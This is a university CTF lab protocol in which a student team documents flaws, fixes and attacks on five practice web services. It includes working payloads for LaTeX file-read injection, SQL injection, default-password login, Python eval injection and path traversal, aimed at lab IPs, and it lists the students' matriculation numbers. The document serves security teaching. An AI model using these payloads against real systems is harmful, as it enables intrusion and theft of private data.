############################################################################### # Protocol for CTF # ############################################################################### Information regarding the protocol: It is mandatory to hand in a protocol. It is the basis for the grading of the lab of the lecture. Therefore, start writing the protocol timely! Hints: * Describe all flaws you have found in the services. * Also explain how you fixed these flaws. * If you found flaws but did not make it to fix them, describe the vulnerabilities and what has to be done in order to fix them. * There may be flaws or bad configurations at different locations. If you find them, document them, regardless whether they are exploitable or not. * Document your creative offense/defense ideas/approaches. Is is important to describe them, regardless whether they have been implemented or not. e.g.: automated attacks, exploiting vulnerabilities in service A to get flags from service B, ... * Document the attacks made by you. If an attack was not successful, this should be documented nevertheless as you could still get points for it. In this case, precisely describe your approach and the errors occurred. * If you want to attach additional files such as source code, screenshots, etc, refer to them (filename) and hand them in together with this protocol as an archive (zip, tar, etc). * More information about the grading can also be found in tuwel in the document about CTF information and rules in the section about the CTF. ############################################################################### # Team ############################################################################### Teamname: (L) PwnMe Team-ID: 32 ------------------------------------------------------------------------------- Matriculation number, first name, last name ------------------------------------------------------------------------------- 1: 01634247, Lukas, Schneckenleitner 2: 01624280, Leonhard, Alton 3: 01527703, Marcel, Juen ------------------------------------------------------------------------------- ############################################################################### # Service NetterGuestbook ############################################################################### ------------------------------------------------------------------------------- 1) Description of the service ------------------------------------------------------------------------------- The netterguestbook allows users to post public and/or private content on a message board. One can even upload/download attachments. If a user wants to post secret one can set a password to show a private message board. Furthermore, the postings may be converted to a pdf file. ------------------------------------------------------------------------------- 2) Found vulnerabilities and solutions ------------------------------------------------------------------------------- There is no input sanitization for the messages which are then used in the latex file and thus, one can post a message to the messageboard, which reads sensitive information while being compiled to a pdf file via latex code injection. ------------------------------------------------------------------------------- 3) Attacks on this service ------------------------------------------------------------------------------- One attack could be to inject some malicious latex code while generating the pdf file by posting such a message: ```latex \end{verbatim}\n\end{enumerate}\n\input{secret}\n\\begin{enumerate}\n\item[May 26 2021 12:21:50]\n\\begin{verbatim} ``` This message crashed the service in the CTF contest. However, it worked on windows environments. The exploit did not work for the Linux/TeX version in the CTF contest. This latex code tries to generate a valid pdf file while also reading the content of the `secret` file and adding it to the pdf. This secret may then be used to read content of other users. The fix is to do some input validation for the message. Our fix is relatively simple by just replacing the slashes and thus do not allow commands to be inserted into a message ```python message.replace("\\", "") ``` This fix would not be sufficient for production environments. There one would need a better input validation than the one used for the CTF contest. E.g.one solution would be to use regex and replace special characters: ```python def sanitize(message): import re return re.sub(r"[-()\"#/@;<>{}`+=~\\\[\]]", "", message) ``` Then upon posting do: ```python cur.execute("INSERT INTO post (date, is_public, secret, message, image_path) VALUES (?, ?, ?, ?, ?)", (date, is_public, secret, sanitize(message), filename)) ``` Or even better would be to use a sanitization library. ############################################################################### # Service NetterMaps ############################################################################### ------------------------------------------------------------------------------- 1) Description of the service ------------------------------------------------------------------------------- The service allows to set markers on a map and assign a name to them. It is also possible to define if the set marker should be publicly available or only visible to the creator. Markers can furthermore be deleted by the creator. ------------------------------------------------------------------------------- 2) Found vulnerabilities and solutions ------------------------------------------------------------------------------- It it is possible to exploit the service by using **SQL Injection** as the input data is not validated and no prepared statements are used. This allows to retrieve all markers including the private ones. To fix this issue we used prepared statements for all queries. ```php pg_query($db, "SELECT * FROM (SELECT * FROM markers WHERE owner = '".$_GET["mepoc"]."' ORDER BY cdate DESC LIMIT 100) x UNION SELECT * FROM (SELECT * FROM markers WHERE rvisible = 1 ORDER BY cdate DESC LIMIT 100) x;"); ``` then becomes ```php pg_prepare($db, "select_marker", "SELECT * FROM (SELECT * FROM markers WHERE owner = $1 ORDER BY cdate DESC LIMIT 100) x UNION SELECT * FROM (SELECT * FROM markers WHERE rvisible = 1 ORDER BY cdate DESC LIMIT 100) x"); $result = pg_execute($db, "select_marker", array($_GET["mepoc"])); ``` ------------------------------------------------------------------------------- 3) Attacks on this service ------------------------------------------------------------------------------- We created a C# application that exploits this problem by setting the get parmeter `mepoc=1' OR 1='1` for `https://10.10.40.xxx:8495/db.php` The program gets the flags from all hosts using that method when possible. The exploit can be found in `MapsAttack.zip`. ############################################################################### # Service NetterMusic ############################################################################### ------------------------------------------------------------------------------- 1) Description of the service ------------------------------------------------------------------------------- The services allows users to create playlists using youtube urls. The playlists can then be shown or used to get randoms songs. It is also possible to delete playlists. ------------------------------------------------------------------------------- 2) Found vulnerabilities and solutions ------------------------------------------------------------------------------- A **standard passsword** was set for the admin account which allowed to get playlists of all users. In `exec.php` - `$admin_password = NETTERMUSIC_ADMIN_PW_PLACEHOLDER` To fix this issue whe changed the password to a strong random password. There were also db queries where SQL Injection could be used (e.g. delete.php using specifier). Preparmend statments can be used again in this case. ------------------------------------------------------------------------------- 3) Attacks on this service ------------------------------------------------------------------------------- We created a C# application that exploits the standard password by using the command `admin` in combination with the login credentials. ``` POST username=admin&password=NETTERMUSIC_ADMIN_PW_PLACEHOLDER&command=admin&specifier= ``` This returns then all available playlists. The program gets the flags from all hosts using that method when possible. The exploit can be found in `MusicAttack.zip`. ############################################################################### # Service NetterNotes ############################################################################### ------------------------------------------------------------------------------- 1) Description of the service ------------------------------------------------------------------------------- Simple note taking app. Can place notes and see them. Option to set a password for the note. When done so, password is needed to review the note. The application is written in python with flask. ------------------------------------------------------------------------------- 2) Found vulnerabilities and solutions ------------------------------------------------------------------------------- There is a code execution withing python environment vulnerabillity. Because of the use of `eval()` function with user controllable input. The issue is here: ```python my_password_provided = eval(password) if my_password_provided == my_password_hashed: notes.append(entry) ``` It is possible to execute arbitrary python code here. The simplest exploit is to set `my_password_provided` to the value of `my_password_hashed`. ------------------------------------------------------------------------------- 3) Attacks on this service ------------------------------------------------------------------------------- Attacks seen on this service include the one described above. 'http://10.10.40.132:8000/locked?title=Confidential&password=my_password_hashed' But also variants where the password is taken out of the entry entity. 'http://10.10.40.132:8000/locked?title=Z6XUB5998ZTCQE3O&password=entry%5B%27note_password%27%5D' Or where code is executed to append desired entry to the list that gets returned. 'http://10.10.40.132:8000/locked?title=Confidential&password=notes.append%28entry%29' The exploit may be found in `netternotes_exploit.py`. ############################################################################### # Service NetterPizza ############################################################################### ------------------------------------------------------------------------------- 1) Description of the service ------------------------------------------------------------------------------- A pizza delivery portal. The application consists of a frontedn in PHP with apache webserver. Over a shell script teh backend program is executed, which is a ELF. The backend service is written in a language with .prog extension, which is in the end C code, but obfuscated. The obfuscation is partially removed in the Makefile and the rest is in fact, tokes that are replaced and handed to the compiler via a headerfile for it to interpret it. It is possible to generate readable C source files in two steps: * Stop the makefile from deleting the intermediate c source files. * And replacing all the tokens. ``` #!/bin/bash find . -type f -name .\*.c -exec sed -i 's/RB_/\(/g' {} \; find . -type f -name .\*.c -exec sed -i 's/_RB/\)/g' {} \; find . -type f -name .\*.c -exec sed -i 's/_EI/;/g' {} \; find . -type f -name .\*.c -exec sed -i 's/LIE/false/g' {} \; find . -type f -name .\*.c -exec sed -i 's/TRUTH/true/g' {} \; find . -type f -name .\*.c -exec sed -i 's/LOGIC/bool/g' {} \; find . -type f -name .\*.c -exec sed -i 's/_CB/\}/g' {} \; find . -type f -name .\*.c -exec sed -i 's/CB_/\{/g' {} \; find . -type f -name .\*.c -exec sed -i 's/_SB/\]/g' {} \; find . -type f -name .\*.c -exec sed -i 's/SB_/\[/g' {} \; find . -type f -name .\*.c -exec sed -i 's/ALTERNATE/switch/g' {} \; find . -type f -name .\*.c -exec sed -i 's/OPTION/case/g' {} \; find . -type f -name .\*.c -exec sed -i 's/IS/if/g' {} \; find . -type f -name .\*.c -exec sed -i 's/EQUAL_TO/==/g' {} \; find . -type f -name .\*.c -exec sed -i 's/STOPHERE/break/g' {} \; find . -type f -name .\*.c -exec sed -i 's/FLOOP/for/g' {} \; find . -type f -name .\*.c -exec sed -i 's/OTHERWISE/else/g' {} \; find . -type f -name .\*.c -exec sed -i 's/NOTHING/void/g' {} \; find . -type f -name .\*.c -exec sed -i 's/AS_LONG/while/g' {} \; find . -type f -name .\*.c -exec sed -i 's/NUMBER/int/g' {} \; find . -type f -name .\*.c -exec sed -i 's/STRING/char*/g' {} \; find . -type f -name .\*.c -exec sed -i 's/POINTER/void*/g' {} \; find . -type f -name .\*.c -exec sed -i 's/CHARACTER/char/g' {} \; find . -type f -name .\*.c -exec sed -i 's/ERRNO/errno/g' {} \; find . -type f -name .\*.c -exec sed -i 's/GIVEBACK/return/g' {} \; find . -type f -name .\*.c -exec sed -i 's/OTHERWifE/else/g' {} \; ``` This may also be done by somehow only invoking the preprocessor before compiling. ------------------------------------------------------------------------------- 2) Found vulnerabilities and solutions ------------------------------------------------------------------------------- This service may be vulnerable to path traversal. Since the database for the userdata is saved text files in folders with ids (e.g. ./db/242/userdata). The username may then be used to inject the path. In particular this line seems vulnerable: ```c snprintf ( path, strlen ( namelist [ n ] POINT d_name ) + strlen ( dirname ) + 2, "%s/%s", dirname, namelist [ n ] POINT d_name ) ; ``` Since here the name is used in the path and is potentially unsanitized. ------------------------------------------------------------------------------- 3) Attacks on this service ------------------------------------------------------------------------------- We observed the path traversal in the username field: `../109/../`. This way another user's data is returned. ``` [Sat Jun 04 14:21:14.248006 2022] [php7:notice] [pid 436] [client 172.28.0.2:43478] Incoming view with, '../109/../' and 123 -> Data of test:|\tdelivery address: test|\tTel: test||Data of ECI6AT52F1UODU1K:|\tdelivery address: 04062022143607UTCDXLZR1NI4G5FIS9|\tTel: ECI6AT52F1UODU1K||Data of a:|\tdelivery address: a|\tTel: a| ``` ############################################################################### # Comments # # Any comments related to the CTF. This part is not used for the evaluation. # Feedback helps us to improve this event for next semester. # ############################################################################### TODO